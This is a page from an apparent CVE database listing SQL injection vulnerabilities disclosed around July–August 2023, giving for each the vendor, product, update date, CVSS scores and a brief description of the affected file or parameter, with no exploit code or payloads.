Search
Total
8599 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2023-33666 | 1 Ai-dev | 1 Aioptimizedcombinations | 2023-08-08 | N/A | 9.8 CRITICAL |
| ai-dev aioptimizedcombinations before v0.1.3 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php. | |||||
| CVE-2023-33665 | 1 Ai-dev | 1 Ai-table | 2023-08-08 | N/A | 9.8 CRITICAL |
| ai-dev aitable before v0.2.2 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php. | |||||
| CVE-2023-39121 | 1 Emlog | 1 Emlog | 2023-08-08 | N/A | 7.2 HIGH |
| emlog v2.1.9 was discovered to contain a SQL injection vulnerability via the component /admin/user.php. | |||||
| CVE-2022-0366 | 1 Capsule8 | 1 Capsule8 | 2023-08-08 | 6.5 MEDIUM | 8.8 HIGH |
| An authenticated and authorized agent user could potentially gain administrative access via an SQLi vulnerability to Capsule8 Console between versions 4.6.0 and 4.9.1. | |||||
| CVE-2022-39072 | 1 Zte | 4 Mf286r, Mf286r Firmware, Mf289d and 1 more | 2023-08-08 | N/A | 5.4 MEDIUM |
| There is a SQL injection vulnerability in Some ZTE Mobile Internet products. Due to insufficient validation of the input parameters of the SNTP interface, an authenticated attacker could use the vulnerability to execute stored XSS attacks. | |||||
| CVE-2022-29652 | 1 Online Sports Complex Booking System Project | 1 Online Sports Complex Booking System | 2023-08-08 | 4.3 MEDIUM | 6.1 MEDIUM |
| Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=save_client. | |||||
| CVE-2023-1207 | 1 Riverside | 1 Http Headers | 2023-08-08 | N/A | 7.2 HIGH |
| This HTTP Headers WordPress plugin before 1.18.8 has an import functionality which executes arbitrary SQL on the server, leading to an SQL Injection vulnerability. | |||||
| CVE-2023-38954 | 1 Zkteco | 1 Bioaccess Ivs | 2023-08-07 | N/A | 9.8 CRITICAL |
| ZKTeco BioAccess IVS v3.3.1 was discovered to contain a SQL injection vulnerability. | |||||
| CVE-2023-21412 | 1 Axis | 1 License Plate Verifier | 2023-08-07 | N/A | 8.8 HIGH |
| User provided input is not sanitized on the AXIS License Plate Verifier specific “search.cgi” allowing for SQL injections. | |||||
| CVE-2022-4557 | 1 Gruparge | 1 Smartpower | 2023-08-05 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Group Arge Energy and Control Systems Smartpower Web allows SQL Injection.This issue affects Smartpower Web: before 23.01.01. | |||||
| CVE-2023-34635 | 1 Wifi-soft | 1 Unibox Administration | 2023-08-04 | N/A | 9.8 CRITICAL |
| Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page. | |||||
| CVE-2023-37771 | 1 Phpgurukul | 1 Art Gallery Management System | 2023-08-04 | N/A | 9.8 CRITICAL |
| Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php. | |||||
| CVE-2023-3983 | 1 Advantech | 1 Iview | 2023-08-04 | N/A | 8.8 HIGH |
| An authenticated SQL injection vulnerability exists in Advantech iView versions prior to v5.7.4 build 6752. An authenticated remote attacker can bypass checks in com.imc.iview.utils.CUtils.checkSQLInjection() to perform blind SQL injection. | |||||
| CVE-2023-39122 | 1 Bmc | 1 Control-m | 2023-08-04 | N/A | 9.8 CRITICAL |
| BMC Control-M through 9.0.20.200 allows SQL injection via the /RF-Server/report/deleteReport report-id parameter. This is fixed in 9.0.21 (and is also fixed by a patch for 9.0.20.200). | |||||
| CVE-2023-37647 | 1 Sem-cms | 1 Semcms | 2023-08-04 | N/A | 9.8 CRITICAL |
| SEMCMS v1.5 was discovered to contain a SQL injection vulnerability via the id parameter at /Ant_Suxin.php. | |||||
| CVE-2020-21662 | 1 Yunyecms | 1 Yunyecms | 2023-08-03 | N/A | 9.8 CRITICAL |
| SQL injection vulnerability in yunyecms 2.0.2 allows remote attackers to run arbitrary SQL commands via XFF. | |||||
| CVE-2023-38992 | 1 Jeecg | 1 Jeecg Boot | 2023-08-03 | N/A | 9.8 CRITICAL |
| jeecg-boot v3.5.1 was discovered to contain a SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData. | |||||
| CVE-2023-3987 | 1 Simple Online Mens Salon Management System Project | 1 Simple Online Mens Salon Management System | 2023-08-03 | N/A | N/A |
| A vulnerability was found in SourceCodester Simple Online Mens Salon Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/?page=user/manage_user&id=3. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235608. | |||||
| CVE-2023-3988 | 1 Cafe Billing System Project | 1 Cafe Billing System | 2023-08-03 | N/A | 9.8 CRITICAL |
| A vulnerability was found in Cafe Billing System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file index.php of the component Order Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235609 was assigned to this vulnerability. | |||||
| CVE-2023-26859 | 1 Brevo | 1 Brevo | 2023-08-02 | N/A | 9.8 CRITICAL |
| SQL injection vulnerability found in PrestaShop sendinblue v.4.0.15 and before allow a remote attacker to gain privileges via the ajaxOrderTracking.php component. | |||||
| CVE-2023-1522 | 1 Genetec | 1 Security Center | 2023-08-02 | N/A | 8.8 HIGH |
| SQL Injection in the Hardware Inventory report of Security Center 5.11.2. | |||||
| CVE-2008-0491 | 1 Fgallery Project | 1 Fgallery | 2023-08-02 | 7.5 HIGH | N/A |
| SQL injection vulnerability in fim_rss.php in the fGallery 2.4.1 plugin for WordPress allows remote attackers to execute arbitrary SQL commands via the album parameter. | |||||
| CVE-2008-0616 | 1 Dmsguestbook Project | 1 Dmsguestbook | 2023-08-02 | 6.5 MEDIUM | N/A |
| SQL injection vulnerability in the administration panel in the DMSGuestbook 1.7.0 plugin for WordPress allows remote authenticated administrators to execute arbitrary SQL commands via unspecified vectors. NOTE: it is not clear whether this issue crosses privilege boundaries. | |||||
| CVE-2014-4873 | 1 Bmc | 1 Track-it\! | 2023-08-02 | 6.5 MEDIUM | N/A |
| SQL injection vulnerability in TrackItWeb/Grid/GetData in BMC Track-It! 11.3.0.355 allows remote authenticated users to execute arbitrary SQL commands via crafted POST data. | |||||
| CVE-2023-2601 | 1 Wp Brutal Ai Project | 1 Wp Brutal Ai | 2023-08-02 | N/A | 9.8 CRITICAL |
| The wpbrutalai WordPress plugin before 2.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF. | |||||
| CVE-2023-35088 | 1 Apache | 1 Inlong | 2023-08-02 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements Used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.7.0. In the toAuditCkSql method, the groupId, streamId, auditId, and dt are directly concatenated into the SQL query statement, which may lead to SQL injection attacks. Users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8198 | |||||
| CVE-2023-37258 | 1 Dataease | 1 Dataease | 2023-08-01 | N/A | 9.8 CRITICAL |
| DataEase is an open source data visualization analysis tool. Prior to version 1.18.9, DataEase has a SQL injection vulnerability that can bypass blacklists. The vulnerability has been fixed in v1.18.9. There are no known workarounds. | |||||
| CVE-2023-30151 | 1 Prestashop | 1 Prestashop | 2023-08-01 | N/A | 9.8 CRITICAL |
| A SQL injection vulnerability in the Boxtal (envoimoinscher) module for PrestaShop, after version 3.1.10, allows remote attackers to execute arbitrary SQL commands via the `key` GET parameter. | |||||
| CVE-2023-2636 | 1 An Gradebook Project | 1 An Gradebook | 2023-07-31 | N/A | 8.8 HIGH |
| The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber | |||||
| CVE-2023-30625 | 1 Rudderstack | 1 Rudder-server | 2023-07-31 | N/A | 8.8 HIGH |
| rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue. | |||||
| CVE-2023-37361 | 1 Vanderbilt | 1 Redcap | 2023-07-31 | N/A | 2.7 LOW |
| REDCap 12.0.26 LTS and 12.3.2 Standard allows SQL Injection via scheduling, repeatforms, purpose, app_title, or randomization. | |||||
| CVE-2023-37165 | 1 Millhouse-project Project | 1 Millhouse-project | 2023-07-31 | N/A | 9.8 CRITICAL |
| Millhouse-Project v1.414 was discovered to contain a remote code execution (RCE) vulnerability via the component /add_post_sql.php. | |||||
| CVE-2023-3854 | 1 Phpscriptpoint | 1 Bloodbank | 2023-07-31 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical has been found in phpscriptpoint BloodBank 1.1. Affected is an unknown function of the file /search of the component POST Parameter Handler. The manipulation of the argument country/city/blood_group_id leads to sql injection. It is possible to launch the attack remotely. VDB-235206 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2023-35066 | 1 Infodrom | 1 E-invoice Approval System | 2023-07-31 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Infodrom Software E-Invoice Approval System allows SQL Injection.This issue affects E-Invoice Approval System: before v.20230701. | |||||
| CVE-2023-3046 | 1 Biltay | 1 Scienta | 2023-07-31 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Biltay Technology Scienta allows SQL Injection.This issue affects Scienta: before 20230630.1953. | |||||
| CVE-2023-3859 | 1 Phpscriptpoint | 1 Car Listing | 2023-07-31 | N/A | 9.8 CRITICAL |
| A vulnerability was found in phpscriptpoint Car Listing 1.6 and classified as critical. This issue affects some unknown processing of the file /search.php of the component GET Parameter Handler. The manipulation of the argument brand_id/model_id/car_condition/car_category_id/body_type_id/fuel_type_id/transmission_type_id/year/mileage_start/mileage_end/country/state/city leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235211. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2023-1547 | 1 Elra | 1 Parkmatik | 2023-07-31 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Elra Parkmatik allows SQL Injection through SOAP Parameter Tampering, Command Line Execution through SQL Injection.This issue affects Parkmatik: before 02.01-a51. | |||||
| CVE-2023-2761 | 1 Solwininfotech | 1 User Activity Log | 2023-07-31 | N/A | 7.2 HIGH |
| The User Activity Log WordPress plugin before 1.6.3 does not properly sanitise and escape the `txtsearch` parameter before using it in a SQL statement in some admin pages, leading to a SQL injection exploitable by high privilege users such as admin. | |||||
| CVE-2023-3850 | 1 Lost And Found Information System Project | 1 Lost And Found Information System | 2023-07-31 | N/A | 9.8 CRITICAL |
| A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_category of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-235201 was assigned to this vulnerability. | |||||
| CVE-2023-3791 | 1 Ibos | 1 Ibos | 2023-07-28 | N/A | 9.8 CRITICAL |
| A vulnerability was found in IBOS OA 4.5.5 and classified as critical. Affected by this issue is the function actionExport of the file ?r=contact/default/export of the component Personal Office Address Book. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2023-3877 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/add-services.php. The manipulation of the argument cost leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235239. | |||||
| CVE-2023-3879 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/del_category.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235241 was assigned to this vulnerability. | |||||
| CVE-2023-3878 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/about-us.php. The manipulation of the argument pagedes leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235240. | |||||
| CVE-2023-3882 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability, which was classified as critical, has been found in Campcodes Beauty Salon Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit-accepted-appointment.php. The manipulation of the argument contactno leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235244. | |||||
| CVE-2023-3839 | 1 Dedebiz | 1 Dedebiz | 2023-07-28 | N/A | 7.2 HIGH |
| A vulnerability, which was classified as problematic, has been found in DedeBIZ 6.2.10. Affected by this issue is some unknown functionality of the file /admin/sys_sql_query.php. The manipulation of the argument sqlquery leads to sql injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-235190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2023-3880 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/del_service.php. The manipulation of the argument editid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235242 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-3881 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability classified as critical was found in Campcodes Beauty Salon Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php. The manipulation of the argument contactno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235243. | |||||
| CVE-2023-3872 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability classified as critical was found in Campcodes Beauty Salon Management System 1.0. This vulnerability affects unknown code of the file /admin/edit-services.php. The manipulation of the argument editid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235234 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-3875 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability has been found in Campcodes Beauty Salon Management System 0.1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/del_feedback.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235237 was assigned to this vulnerability. | |||||
| CVE-2023-3874 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability, which was classified as critical, was found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235236. | |||||